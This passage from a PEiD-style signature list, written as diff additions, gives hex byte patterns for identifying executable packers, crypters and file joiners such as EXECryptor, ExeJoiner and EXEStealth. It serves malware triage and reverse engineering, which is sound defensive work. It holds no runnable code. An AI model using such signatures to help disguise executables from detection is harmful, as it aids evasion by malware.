+signature = 90 90 60 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 4E 28 40 00 8B F7 AC
+ep_only = true
+
+[EXECryptor 2.0/2.1 (protected IAT)]
+signature = A4 ?? ?? ?? 00 00 00 00 FF FF FF FF 3C ?? ?? ?? 94 ?? ?? ?? D8 ?? ?? ?? 00 00 00 00 FF FF FF FF B8 ?? ?? ?? D4 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 60 ?? ?? ?? 70 ?? ?? ?? 84 ?? ?? ?? 00 00 00 00 75 73 65 72 33 32 2E 64 6C 6C 00 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41
+ep_only = false
+
+[EXECryptor 2.1.17 -> Strongbit/SoftComplete Development]
+signature = BE ?? ?? ?? ?? B8 00 00 ?? ?? 89 45 FC 89 C2 8B 46 0C 09 C0 0F 84 ?? 00 00 00 01 D0 89 C3 50 FF 15 94 ?? ?? ?? 09 C0 0F 85 0F 00 00 00 53 FF 15 98 ?? ?? ?? 09 C0 0F 84 ?? 00 00 00 89 45 F8 6A 00 8F 45 F4 8B 06 09 C0 8B 55 FC 0F 85 03 00 00 00 8B 46 10 01
+ep_only = false
+
+[EXECryptor 2.2.4 -> Strongbit/SoftComplete Development (h1)]
+signature = E8 F7 FE FF FF 05 ?? ?? 00 00 FF E0 E8 EB FE FF FF 05 ?? ?? 00 00 FF E0 E8 04 00 00 00 FF FF FF FF 5E C3
+ep_only = true
+
+[EXECryptor 2.2.4 -> Strongbit/SoftComplete Development (h2)]
+signature = E8 F7 FE FF FF 05 ?? ?? 00 00 FF E0 E8 EB FE FF FF 05 ?? ?? 00 00 FF E0 E8 ?? 00 00 00
+ep_only = true
+
+[EXECryptor 2.2.4 -> Strongbit/SoftComplete Development (h3)]
+signature = 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73
+ep_only = false
+
+[EXECryptor 2.2.6 (minimum protection)]
+signature = 50 68 ?? ?? ?? ?? 58 81 E0 ?? ?? ?? ?? E9 ?? ?? ?? 00 87 0C 24 59 E8 ?? ?? ?? 00 89 45 F8 E9 ?? ?? ?? ?? 0F 83 ?? ?? ?? 00 E9 ?? ?? ?? ?? 87 14 24 5A 57 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 58 81 C0 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? 81 C8 ?? ?? ?? ?? 81 E0 ?? ?? ?? ?? E9 ?? ?? ?? 00 C3 E9 ?? ?? ?? ?? C3 BF ?? ?? ?? ?? 81 CB ?? ?? ?? ?? BA ?? ?? ?? ?? 52 E9 ?? ?? ?? 00 E8 ?? ?? ?? 00 E9 ?? ?? ?? 00 E9 ?? ?? ?? ?? 87 34 24 5E 66 8B 00 66 25 ?? ?? E9 ?? ?? ?? ?? 8B CD 87 0C 24 8B EC 51 89 EC 5D 8B 05 ?? ?? ?? ?? 09 C0 E9 ?? ?? ?? ?? 59 81 C1 ?? ?? ?? ?? C1 C1 ?? 23 0D ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? E9 ?? ?? ?? ?? C3 E9 ?? ?? ?? 00 13 D0 0B F9 E9 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 64 24 08 31 C0 64 8F 05 00 00 00 00 5A E9 ?? ?? ?? ?? 3C A4 0F 85 ?? ?? ?? 00 8B 45 FC 66 81 38 ?? ?? 0F 84 05 00 00 00 E9 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? 87 3C 24 5F 31 DB 31 C9 31 D2 68 ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 45 FC 33 C0 89 45 F4 83 7D FC 00 E9 ?? ?? ?? ?? 53 52 8B D1 87 14 24 81 C0 ?? ?? ?? ?? 0F 88 ?? ?? ?? ?? 3B CB
+ep_only = true
+
+[EXECryptor 2.2.6 DLL (minimum protection)]
+signature = 50 8B C6 87 04 24 68 ?? ?? ?? ?? 5E E9 ?? ?? ?? ?? 85 C8 E9 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 0F 81 ?? ?? ?? 00 81 FA ?? ?? ?? ?? 33 D0 E9 ?? ?? ?? 00 0F 8D ?? ?? ?? 00 81 D5 ?? ?? ?? ?? F7 D1 0B 15 ?? ?? ?? ?? C1 C2 ?? 81 C2 ?? ?? ?? ?? 9D E9 ?? ?? ?? ?? C1 E2 ?? C1 E8 ?? 81 EA ?? ?? ?? ?? 13 DA 81 E9 ?? ?? ?? ?? 87 04 24 8B C8 E9 ?? ?? ?? ?? 55 8B EC 83 C4 F8 89 45 FC 8B 45 FC 89 45 F8 8B 45 08 E9 ?? ?? ?? ?? 8B 45 E0 C6 00 00 FF 45 E4 E9 ?? ?? ?? ?? FF 45 E4 E9 ?? ?? ?? 00 F7 D3 0F 81 ?? ?? ?? ?? E9 ?? ?? ?? ?? 87 34 24 5E 8B 45 F4 E8 ?? ?? ?? 00 8B 45 F4 8B E5 5D C3 E9
+ep_only = true
+
+[EXECryptor 2.2/2.3 (compressed code) -> www.strongbit.com]
+signature = E8 00 00 00 00 58 ?? ?? ?? ?? ?? 8B 1C 24 81 EB ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 6A 04 68 00 10 00 00 50 6A 00 B8 C4 ?? ?? ?? 8B 04 18 FF D0 59 BA ?? ?? ?? ?? 01 DA 52 53 50 89 C7 89 D6 FC F3 A4 B9 ?? ?? ?? ?? 01 D9 FF D1 58 8B 1C 24 68 00 80 00 00 6A 00 50
+ep_only = false
+
+[EXECryptor 2.2/2.3 (compressed code) -> www.strongbit.com]
+signature = E8 00 00 00 00 58 ?? ?? ?? ?? ?? 8B 1C 24 81 EB ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 6A 04 68 00 10 00 00 50 6A 00 B8 C4 ?? ?? ?? 8B 04 18 FF D0 59 BA ?? ?? ?? ?? 01 DA 52 53 50 89 C7 89 D6 FC F3 A4 B9 ?? ?? ?? ?? 01 D9 FF D1 58 8B 1C 24 68 00 80 00 00 6A 00 50 B8 C8 ?? ?? ?? 8B 04 18 FF D0 59 58 5B 83 EB 05 C6 03 B8 43 89 03 83 C3 04 C6 03 C3 09 C9 74 46 89 C3 E8 A0 00 00 00 FC AD 83 F8 FF 74 38 53 89 CB 01 C3 01 0B 83 C3 04 AC 3C FE 73 07 25 FF 00 00 00 EB ED 81 C3 FE 00 00 00 09 C0 7A 09 66 AD 25 FF FF 00 00 EB DA AD 4E 25 FF FF FF 00 3D FF FF FF 00 75 CC ?? ?? ?? ?? ?? C3
+ep_only = false
+
+[EXECryptor 2.2/2.3 (protected IAT)]
+signature = CC ?? ?? ?? 00 00 00 00 FF FF FF FF 3C ?? ?? ?? B4 ?? ?? ?? 08 ?? ?? ?? 00 00 00 00 FF FF FF FF E8 ?? ?? ?? 04 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4C ?? ?? ?? 60 ?? ?? ?? 70 ?? ?? ?? 84 ?? ?? ?? 94 ?? ?? ?? A4 ?? ?? ?? 00 00 00 00 75 73 65 72 33 32 2E 64 6C 6C 00 00 00 00 4D 65 73 73 61 67 65 42 6F 78
+ep_only = false
+
+[EXECryptor 2.3.9 (compressed resources)]
+signature = 51 68 ?? ?? ?? ?? 59 81 F1 12 3C CB 98 E9 53 2C 00 00 F7 D7 E9 EB 60 00 00 83 45 F8 02 E9 E3 36 00 00 F6 45 F8 20 0F 84 1E 21 00 00 55 E9 80 62 00 00 87 0C 24 8B E9 ?? ?? ?? ?? 00 00 23 C1 81 E9 ?? ?? ?? ?? 57 E9 ED 00 00 00 0F 88 ?? ?? ?? ?? E9 2C 0D 00 00 81 ED BB 43 CB 79 C1 E0 1C E9 9E 14 00 00 0B 15 ?? ?? ?? ?? 81 E2 2A 70 7F 49 81 C2 9D 83 12 3B E8 0C 50 00 00 E9 A0 16 00 00 59 5B C3 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 E8 41 42 00 00 E9 93 33 00 00 31 DB 89 D8 59 5B C3 A1 ?? ?? ?? ?? 8A 00 2C 99 E9 82 30 00 00 0F 8A ?? ?? ?? ?? B8 01 00 00 00 31 D2 0F A2 25 FF 0F 00 00 E9 72 21 00 00 0F 86 57 0B 00 00 E9 ?? ?? ?? ?? C1 C0 03 E8 F0 36 00 00 E9 41 0A 00 00 81 F7 B3 6E 85 EA 81 C7 ?? ?? ?? ?? 87 3C 24 E9 74 52 00 00 0F 8E ?? ?? ?? ?? E8 5E 37 00 00 68 B1 74 96 13 5A E9 A1 04 00 00 81 D1 49 C0 12 27 E9 50 4E 00 00 C1 C8 1B 1B C3 81 E1 96 36 E5
+ep_only = true
+
+[EXECryptor 2.3.9 (minimum protection)]
+signature = 68 ?? ?? ?? ?? E9 ?? ?? ?? FF 50 C1 C8 18 89 05 ?? ?? ?? ?? C3 C1 C0 18 51 E9 ?? ?? ?? FF 84 C0 0F 84 6A F9 FF FF E9 ?? ?? ?? FF C3 E9 ?? ?? ?? FF E8 CF E9 FF FF B8 01 00 00 00 E9 ?? ?? ?? FF 2B D0 68 A0 36 80 D4 59 81 C9 64 98 FF 99 E9 ?? ?? ?? FF 84 C0 0F 84 8E EC FF FF E9 ?? ?? ?? FF C3 87 3C 24 5F 8B 00 03 45 FC 83 C0 18 E9 ?? ?? ?? FF 87 0C 24 59 B8 01 00 00 00 D3 E0 23 D0 E9 02 18 00 00 0F 8D DB 00 00 00 C1 E8 14 E9 CA 00 00 00 9D 87 0C 24 59 87 1C 24 68 AE 73 B9 96 E9 C5 10 00 00 0F 8A ?? ?? ?? ?? E9 ?? ?? ?? FF 81 FD F5 FF 8F 07 E9 4F 10 00 00 C3 E9 5E 12 00 00 87 3C 24 E9 ?? ?? ?? FF E8 ?? ?? ?? FF 83 3D ?? ?? ?? ?? 00 0F 85 ?? ?? ?? ?? 8D 55 EC B8 ?? ?? ?? ?? E9 ?? ?? ?? FF E8 A7 1A 00 00 E8 2A CB FF FF E9 ?? ?? ?? FF C3 E9 ?? ?? ?? FF 59 89 45 E0
+ep_only = true
+
+[EXECryptor 2.3.9 DLL (compressed resources)]
+signature = 50 68 ?? ?? ?? ?? 58 C1 C0 0F E9 ?? ?? ?? 00 87 04 24 58 89 45 FC E9 ?? ?? ?? FF FF 05 ?? ?? ?? ?? E9 ?? ?? ?? 00 C1 C3 18 E9 ?? ?? ?? ?? 8B 55 08 09 42 F8 E9 ?? ?? ?? FF 83 7D F0 01 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? 00 87 34 24 5E 8B 45 FC 33 D2 56 8B F2 E9 ?? ?? ?? 00 BA ?? ?? ?? ?? E8 ?? ?? ?? 00 A3 ?? ?? ?? ?? C3 E9 ?? ?? ?? 00 C3 83 C4 04 C3 E9 ?? ?? ?? FF 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 E8 ?? ?? ?? 00 E9 ?? ?? ?? FF C1 C2 03 81 CA ?? ?? ?? ?? 81 C2 ?? ?? ?? ?? 03 C2 5A E9 ?? ?? ?? FF 81 E7 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? 89 07 E9 ?? ?? ?? ?? 0F 89 ?? ?? ?? ?? 87 14 24 5A 50 C1 C8 10
+ep_only = true
+
+[EXECryptor 2.3.9 DLL (minimum protection)]
+signature = 51 68 ?? ?? ?? ?? 87 2C 24 8B CD 5D 81 E1 ?? ?? ?? ?? E9 ?? ?? ?? 00 89 45 F8 51 68 ?? ?? ?? ?? 59 81 F1 ?? ?? ?? ?? 0B 0D ?? ?? ?? ?? 81 E9 ?? ?? ?? ?? E9 ?? ?? ?? 00 81 C2 ?? ?? ?? ?? E8 ?? ?? ?? 00 87 0C 24 59 51 64 8B 05 30 00 00 00 8B 40 0C 8B 40 0C E9 ?? ?? ?? 00 F7 D6 2B D5 E9 ?? ?? ?? 00 87 3C 24 8B CF 5F 87 14 24 1B CA E9 ?? ?? ?? 00 83 C4 08 68 ?? ?? ?? ?? E9 ?? ?? ?? 00 C3 E9 ?? ?? ?? 00 E9 ?? ?? ?? 00 50 8B C5 87 04 24 8B EC 51 0F 88 ?? ?? ?? 00 FF 05 ?? ?? ?? ?? E9 ?? ?? ?? 00 87 0C 24 59 99 03 04 24 E9 ?? ?? ?? 00 C3 81 D5 ?? ?? ?? ?? 9C E9 ?? ?? ?? 00 81 FA ?? ?? ?? ?? E9 ?? ?? ?? 00 C1 C3 15 81 CB ?? ?? ?? ?? 81 F3 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 87
+ep_only = true
+
+[EXECryptor 2.x -> SoftComplete Developement]
+signature = A4 ?? ?? 00 00 00 00 00 FF FF FF FF 3C ?? ?? 00 94 ?? ?? 00 D8 ?? ?? 00 00 00 00 00 FF FF FF FF
+ep_only = false
+
+[EXECryptor 2.xx (compressed resources)]
+signature = 56 57 53 31 DB 89 C6 89 D7 0F B6 06 89 C2 83 E0 1F C1 EA 05 74 2D 4A 74 15 8D 5C 13 02 46 C1 E0 08 89 FA 0F B6 0E 46 29 CA 4A 29 C2 EB 32 C1 E3 05 8D 5C 03 04 46 89 FA 0F B7 0E 29 CA 4A 83 C6 02 EB 1D C1 E3 04 46 89 C1 83 E1 0F 01 CB C1 E8 05 73 07 43 89 F2 01 DE EB 06 85 DB 74 0E EB A9 56 89 D6 89 D9 F3 A4 31 DB 5E EB 9D 89 F0 5B 5F 5E C3
+ep_only = false
+
+[EXECryptor 2.xx (max. compressed resources)]
+signature = 55 8B EC 83 C4 EC FC 53 57 56 89 45 FC 89 55 F8 89 C6 89 D7 66 81 3E 4A 43 0F 85 23 01 00 00 83 C6 0A C7 45 F4 08 00 00 00 31 DB BA 00 00 00 80 43 31 C0 E8 11 01 00 00 73 0E 8B 4D F0 E8 1F 01 00 00 02 45 EF AA EB E9 E8 FC 00 00 00 0F 82 97 00 00 00 E8 F1 00 00 00 73 5B B9 04 00 00 00 E8 FD 00 00 00 48 74 DE 0F 89 C7 00 00 00 E8 D7 00 00 00 73 1B 55 BD 00 01 00 00 E8 D7 00 00 00 88 07 47 4D 75 F5 E8 BF 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 C8 00 00 00 83 C0 07 89 45 F0 C6 45 EF 00 83 F8 08 74 89 E8 A9 00 00 00 88 45 EF E9 7C FF FF FF B9 07 00 00 00 E8 A2 00 00 00 50
+ep_only = false
+
+[EXECryptor v1.3.0.45]
+signature = E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1
+ep_only = true
+
+[EXECryptor v1.3.0.45]
+signature = E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1
+ep_only = true
+
+[EXECryptor v1.4.0.1]
+signature = E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 ?? ?? 00 31 C0 89 41 14 89 41 18 80
+ep_only = true
+
+[EXECryptor v1.5.1.x]
+signature = E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 B8 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1 C1 ?? ?? ?? FE C3 31 C0 64 FF 30 64 89 20 CC C3
+ep_only = true
+
+[EXECryptor v1.5.3]
+signature = E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 ?? ?? 00 31 C0 89 41 14 89 41 18 80 A1 C1 00 00 00 FE C3 31 C0 64 FF 30 64 89 20 CC C3
+ep_only = false
+
+[EXECryptor V2.1X -> softcomplete.com]
+signature = 83 C6 14 8B 55 FC E9 ?? FF FF FF
+ep_only = false
+
+[EXECryptor V2.1X -> softcomplete.com]
+signature = E9 ?? ?? ?? ?? 66 9C 60 50 8D 88 ?? ?? ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1
+ep_only = true
+
+[EXECryptor V2.2X -> softcomplete.com]
+signature = FF E0 E8 04 00 00 00 FF FF FF FF 5E C3 00
+ep_only = false
+
+[EXECryptor vx.x.x.x]
+signature = E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 B8 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41
+ep_only = true
+
+[ExeJoiner 1.0 -> Yoda]
+signature = 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 00 C6 00 5C 68 04 01 00 00 68 04 11 40 00 6A 00 E8 1A 03 00 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 68 04 11 40 00 E8 EC 02 00 00 83 F8 FF 0F 84 83 02 00 00 A3 08 12 40 00 6A 00 50 E8 E2 02 00 00 83 F8 FF 0F 84 6D 02 00 00 A3 0C 12 40 00 8B D8 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00 E8 E3 02 00 00 6A 00 68 3C 12 40 00 6A 04 68 1E 12 40 00 FF 35 08 12 40 00 E8 C4 02 00 00 83 EB 04 6A 00 6A 00 53 FF 35 08 12 40 00
+ep_only = true
+
+[ExeJoiner 1.0 -> Yoda f2f]
+signature = 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 00 C6 00 5C 68 04 01 00 00 68 04 11 40 00 6A 00 E8 1A 03 00 00 6A 00 68 80 00 00 00 6A 03 6A 00 6A 01 68 00 00 00 80 68 04 11 40 00 E8 EC 02 00 00 83 F8 FF 0F 84 83 02 00 00 A3 08 12 40 00 6A 00 50
+ep_only = true
+
+[EXEJoiner v1.0]
+signature = 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 C6 00 5C 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 E8
+ep_only = true
+
+[ExeJoiner V1.0 -> Yoda f2f]
+signature = 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 00 C6 00 5C 68 04 01 00 00
+ep_only = true
+
+[EXELOCK 666 1.5]
+signature = BA ?? ?? BF ?? ?? EB ?? EA ?? ?? ?? ?? 79 ?? 7F ?? 7E ?? 1C ?? 48 78 ?? E3 ?? 45 14 ?? 5A E9
+ep_only = true
+
+[ExeLock v1.00]
+signature = 06 8C C8 8E C0 BE ?? ?? 26 ?? ?? 34 ?? 26 ?? ?? 46 81 ?? ?? ?? 75 ?? 40 B3 ?? B3 ?? F3
+ep_only = true
+
+[EXEPACK (LINK) v3.60, v3.64, v3.65 or 5.01.21]
+signature = 8C C0 05 ?? ?? 0E 1F A3 ?? ?? 03 ?? ?? ?? 8E C0 8B ?? ?? ?? 8B ?? 4F 8B F7 FD F3 A4 50 B8 ?? ?? 50 CB
+ep_only = true
+
+[EXEPACK v4.05, v4.06]
+signature = 8C C0 05 ?? ?? 0E 1F A3 ?? ?? 03 06 ?? ?? 8E C0 8B 0E ?? ?? 8B F9 4F 8B F7 FD F3 A4
+ep_only = true
+
+[EXERefactor V0.1 -> random]
+signature = 55 8B EC 81 EC 90 0B 00 00 53 56 57 E9 58 8C 01 00 55 53 43 41 54 49 4F 4E
+ep_only = true
+
+[ExeSafeguard v1.0 -> simonzh]
+signature = C0 5D EB 4E EB 47 DF 69 4E 58 DF 59 74 F3 EB 01 DF 75 EE 9A 59 9C 81 C1 E2 FF FF FF EB 01 DF 9D FF E1 E8 51 E8 EB FF FF FF DF 22 3F 9A C0 81 ED 19 18 40 00 EB 48 EB 47 DF 69 4E 58 DF 59 79 EE EB 01 DF 78 E9 DF 59 9C 81 C1 E5 FF FF FF 9D FF E1 EB 51 E8 EE
+ep_only = false
+
+[ExeShield 3.6 -> www.exeshield.com]
+signature = B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 CE 1E 42 AF F8 D6 CC E9 FB C8 4F 1B 22 7C B4 C8 0D BD 71 A9 C8 1F 5F B1 29 8F 11 73 8F 00 D1 88 87 A9 3F 4D 00 6C 3C BF C0 80 F7 AD 35 23 EB 84 82 6F
+ep_only = true
+
+[ExeShield Cryptor 1.3RC -> Tom Commander]
+signature = 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 8C 21 40 00 B9 51 2D 40 00 81 E9 E6 21 40 00 8B D5 81 C2 E6 21 40 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC
+ep_only = true
+
+[ExeShield Protector V3.6 -> www.exeshield.com]
+signature = B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 CE 1E 42 AF F8 D6 CC
+ep_only = true
+
+[ExeSmasher vx.x]
+signature = 9C FE 03 ?? 60 BE ?? ?? 41 ?? 8D BE ?? 10 FF FF 57 83 CD FF EB 10
+ep_only = true
+
+[ExeSplitter 1.2 -> Bill Prisoner / TPOC]
+signature = E9 95 02 00 00 64 A1 00 00 00 00 83 38 FF 74 04 8B 00 EB F7 8B 40 04 C3 55 8B EC B8 00 00 00 00 8B 75 08 81 E6 00 00 FF FF B9 06 00 00 00 56 56 E8 B0 00 00 00 5E 83 F8 01 75 06 8B C6 C9 C2 04 00 81 EE 00 00 01 00 E2 E5 C9 C2 04 00 55 8B EC 8B 75 0C 8B DE 03 76 3C 8D 76 18 8D 76 60 8B 36 03 F3 56 8B 76 20 03 F3 33 D2 8B C6 8B 36 03 F3 8B 7D 08 B9 0E 00 00 00 FC F3 A6 0B C9 75 02 EB 08
+ep_only = false
+
+[ExeSplitter 1.3 (Split Method) -> Bill Prisoner / TPOC]
+signature = E8 00 00 00 00 5D 81 ED 08 12 40 00 E8 66 FE FF FF 55 50 8D 9D 81 11 40 00 53 8D 9D 21 11 40 00 53 6A 08 E8 76 FF FF FF 6A 40 68 00 30 00 00 68 00 01 00 00 6A 00 FF 95 89 11 40 00 89 85 61 10 40 00 50 68 00 01 00 00 FF 95 85 11 40 00 8D 85 65 10 40 00 50 FF B5 61 10 40 00 FF 95 8D 11 40 00 6A 00 68 80 00 00 00 6A 02 6A 00 ?? ?? ?? ?? 01 1F 00 FF B5 61 10 40 00 FF 95 91 11 40 00 89 85 72 10 40 00 6A 00 8D ?? ?? ?? ?? 00 50 FF B5 09 10 40 00 8D 85 F5 12 40 00 50 FF B5 72 10 40 00 FF 95 95 11 40 00 FF B5 72 10 40 00 FF 95 99 11 40 00 8D 85 0D 10 40 00 50 8D 85 1D 10 40 00 50 B9 07 00 00 00 6A 00 E2 FC
+ep_only = false
+
+[ExeSplitter 1.3 (Split Method) -> Bill Prisoner / TPOC]
+signature = E9 FE 01 00 00 ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 73 76 63 45 72 30 31 31 2E 74 6D 70 00 00 00 00 00 00 00 00 00 64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 85 C0 0F 84 5F 02 00 00 8B 48 30 80 39 6B 74 07 80 39 4B 74 02 EB E7 80 79 0C 33 74 02 EB DF 8B 40 18 C3
+ep_only = true
+
+[ExeSplitter 1.3 (Split+Crypt Method) -> Bill Prisoner / TPOC]
+signature = 15 10 05 23 14 56 57 57 48 12 0B 16 66 66 66 66 66 66 66 66 66 02 C7 56 66 66 66 ED 26 6A ED 26 6A ED 66 E3 A6 69 E2 39 64 66 66 ED 2E 56 E6 5F 0D 12 61 E6 5F 2D 12 64 8D 81 E6 1F 6A 55 12 64 8D B9 ED 26 7E A5 33 ED 8A 8D 69 21 03 12 36 14 09 05 27 02 02 14 03 15 15 27 ED 2B 6A ED 13 6E ED B8 65 10 5A EB 10 7E EB 10 06 ED 50 65 95 30 ED 10 46 65 95 55 B4 ED A0 ED 50 65 95 37 ED 2B 6A EB DF AB 76 26 66 3F DF 68 66 66 66 9A 95 C0 6D AF 13 64
+ep_only = false
+
+[ExeSplitter 1.3 (Split+Crypt Method) -> Bill Prisoner / TPOC]
+signature = E8 00 00 00 00 5D 81 ED 05 10 40 00 B9 ?? ?? ?? ?? 8D 85 1D 10 40 00 80 30 66 40 E2 FA 8F 98 67 66 66 ?? ?? ?? ?? ?? ?? ?? 66
+ep_only = true
+
+[EXEStealth 2.75 -> WebtoolMaster]
+signature = 90 60 90 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00
+ep_only = true
+
+[EXEStealth 2.76 Unregistered -> WebtoolMaster]
+signature = EB ?? 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 53 68 61 72 65 77 61 72 65 20
+ep_only = false
+
+[ExeTools COM2EXE]
+signature = E8 ?? ?? 5D 83 ED ?? 8C DA 2E 89 96 ?? ?? 83 C2 ?? 8E DA 8E C2 2E 01 96 ?? ?? 60
+ep_only = true
+
+[ExeTools v2.1 Encruptor by DISMEMBER]
+signature = E8 ?? ?? 5D 83 ?? ?? 1E 8C DA 83 ?? ?? 8E DA 8E C2 BB ?? ?? BA ?? ?? 85 D2 74
+ep_only = true
+
+[eXPressor 1.1 -> CGSoftLabs]
+signature = E9 ?? ?? 00 00 E9 ?? ?? 00 00 E9 ?? 12 00 00 E9 ?? 0C 00 00 E9 ?? ?? 00 00 E9 ?? ?? 00 00 E9 ?? ?? 00 00
+ep_only = true
+
+[eXPressor 1.2 -> CGSoftLabs]
+signature = 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E
+ep_only = true
+
+[eXPressor 1.2.0 Beta PE Packer]
+signature = 55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 EB ?? 45 78 50 72 2D 76 2E 31 2E 32 2E 2E
+ep_only = true
+
+[eXPressor V1.0 -> CGSoftLabs]
+signature = E9 35 14 00 00 E9 31 13 00 00 E9 98 12 00 00 E9 EF 0C 00 00 E9 42 13 00 00 E9 E9 02 00 00 E9 EF 0B 00 00 E9 1B 0D 00 00
+ep_only = true
+
+[eXpressor v1.1 -> CGSoftLabs]
+signature = E9 15 13 00 00 E9 F0 12 00 00 E9 58 12 00 00 E9 AF 0C 00 00 E9 AE 02 00 00 E9 B4 0B 00 00 E9 E0 0C 00 00
+ep_only = true
+
+[eXPressor v1.2 -> CGSoftLabs]
+signature = 45 78 50 72 2D 76 2E 31 2E 32 2E
+ep_only = false
+
+[eXpressor v1.2 -> CGSoftLabs]
+signature = 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76
+ep_only = true
+
+[eXPressor v1.2 -> CGSoftLabs]
+signature = 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E B8 ?? ?? ?? ?? 2B 05 84 ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 16 A1 ?? ?? ?? ?? 03 05 80 ?? ?? ?? 89 85 54 FE FF FF E9 ?? 07 00 00 C7 05 ?? ?? ?? ?? 01 00 00 00 68 04
+ep_only = true
+
+[eXPressor v1.2 -> CGSoftLabs]
+signature = 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E B8 ?? ?? ?? ?? 2B 05 84 ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 74 16 A1 ?? ?? ?? ?? 03 05 80 ?? ?? ?? 89 85 54 FE FF FF E9 ?? 07 00 00 C7 05 ?? ?? ?? ?? 01 00 00 00 68 04 01 00 00 8D 85 F0 FE FF FF 50 6A 00 FF 15
+ep_only = true
+
